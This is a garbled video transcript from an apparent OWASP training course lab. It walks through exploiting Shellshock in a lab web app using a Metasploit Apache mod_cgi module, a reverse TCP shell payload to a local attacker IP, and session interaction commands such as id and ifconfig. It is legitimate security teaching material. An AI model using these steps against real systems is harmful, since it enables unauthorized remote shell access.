OWASP

Course
Time
12 hours 9 minutes
Difficulty
Beginner
CEU/CPE
12

Video Transcription

00:01
Hi, everyone. Welcome back to the core. So in the last video, we went ahead and started configuring Armin Exploit framework console. So that way we can start running our show. Shaq Attack. Now, in this video, I've already actually in the background there. You'll see I've already typed in the EU's exploit etcetera from step 20. But we'll go ahead and we'll start that together as well. And then we move forward with the rest of our lap.
00:22
So we're gonna type in use and then exploit
00:27
on and we'll go back to the lab document here so you could see so use exploit. That will type in fort slash multi forward slash http ford slash Apache Underscore m o d underscore cg I underscore Bash
00:41
underscore e n v
00:43
and then finally underscore e x e c.
00:46
So, as I mentioned, I've already run the command, but it will not hurt us to run it again. So you wanted to use space. Exploit ford slash multi
00:56
ford slash http
00:58
ford slash Apache
01:00
Underscore M o d
01:03
100! You put a lot of these there. Let's go back. There we go. Underscore c g I
01:08
underscore. Bash
01:11
underscore e n V and then finally underscore e x e c. And that is President Turner. Keep alert. Now, his invention. I've already run it. So that's why I'm already in that particular module.
01:21
All right, so let's go back for a lab document here.
01:23
So the next thing we're gonna do is just type in show options so we can see what kind of options we have for our particular attack.
01:30
So let's do show options here.
01:33
And then a list out all the options available to us.
01:37
So if you scroll up, you can take a look and see.
01:42
All right, So let's go back to our lab. Dr. Me? No.
01:46
So we're gonna type in first. We're gonna do set our host set our host mutilate day. So again, we're not doing the s. There is not our host like we've done before. We're gonna do set our host Mattila Day.
01:57
So set our hosts and then you till today.
02:01
All right, And then just press and turn your keyboard,
02:05
and then we're gonna go ahead and do the second command here. The set target you are I four slash cg i dash band four slash status dot c g i So let's go ahead and type that now. So set.
02:17
And there were two type in target. U R I
02:21
and what type of correctly there.
02:24
All right. And next we're gonna put a space, and then we'll take the rest of our command here. So the ford slash c g I dash and been ford slash status dot c g i So we'll start off by just typing. Enforce Last c g. I been so that when we can slow down a little bit for this lab.
02:39
So where do you force last? C g i dash been,
02:43
we'll do a Ford slash
02:45
and nowhere to type in status dot c g I
02:49
Okay, so we'll type in status
02:51
dot c g. I will just go ahead and hit enter on a keyboard to run that
02:54
it might take a moment so you'll see to run that command for us.
02:59
So let's move on to the next part of our lab.
03:00
So now we're going to specify the reverse shell that we want to use for a payload in this attacks. And now we're just gonna basically set our payload with this particular river shell will show options, and then we'll go through actually run this payload a little later on in this lab. So we're gonna protect this command here, so we'll type in set, and then payload will start off with that. So typeset,
03:21
then, payload,
03:23
we'll put a space.
03:24
Next. We're gonna type Lennox Ford slash x 86.
03:30
So we're type clinics. All lower case four slash x 86
03:35
and then we're gonna type in ford slash shell underscore. Reverse. Underscore. TCP So shell reverse TCP
03:43
so ford slash shell underscore. Reverse
03:46
underscore. TCP
03:49
and I just press enter on the keyboard to run that command.
03:53
All right, so next up, we're gonna type in this show Options command. So here in step 26 we're just gonna type in show options.
04:00
Simple kind of options we have
04:01
again, we could scroll up and take a look at the different options available to us for this particular pay loan,
04:08
but for us, we're just gonna type in. We're gonna set the l host to this I p address right here. So set l host
04:15
to this I p address here. This 1 92.168 dot 1.50.
04:20
So one attitude out 16 pete 160.1 dot 50 and then just press enter into keyboard to run the command.
04:28
All right, so now we're gonna finally run the exploits. So we've set everything up. We could figure it everything We've got. Everything good to go now. We're just gonna take the word run in our command, prompt, and we're gonna see if we're successful in opening our command shells. They just run and then press enter into keyboard.
04:43
All right, so you'll see here that we see started reverse. TCP handler and command shell is open. So at least on my end, I was successful in opening a command shell.
04:53
Now, if you were not successful, if you got some kind of error message, go back through everything you've typed, make sure that your sin test was correct and you've tried everything correctly and then try to run it again.
05:02
All right, so
05:04
the next thing we're to do is actually connect our session here. So we want to go ahead and take control of it where we can talk different commands. So we want to be able to interact with it. So all we're gonna do is type sessions national over case I dash the number one.
05:16
So sessions
05:18
dash lower case. Hi, Dash the number one of those press and turn a keyboard. Now that's going to start the interaction with that session.
05:27
All right, so a few things you can try and see what kind of help what you get. You ca n't tight. I have config and press enter and then also try typing I d and various commands and see what kind information you get back.
05:40
So we're a type I have config.
05:43
It is press enter its evil kind Information. You'll see, we get some i p address information about the local machine there.
05:48
Also, if we type in, i d.
05:51
It'll get us back information about the user I d. So again receive that W w J dash data. So we know that we can run potentially run different commands on the machine.
06:00
All right, so we do see some upper back again. Just play around, run different commands there. In this video, we just wrapped up our discussion or a lab on using components with known vulnerabilities. And the next module, we're gonna talk about a lot of places. A lot of places will log stuff, but they won't actually monitor it, so there's action taken on it.

Up Next

OWASP

Established in 2001, the Open Web Application Security Project (OWASP) offers free security tools and resources to help organizations protect critical apps. Cybrary’s OWASP certification training course covers the organization’s popular “Top 10” risk assessment.

Instructed By

Instructor Profile Image
Ken Underhill
Master Instructor at Cybrary
Master Instructor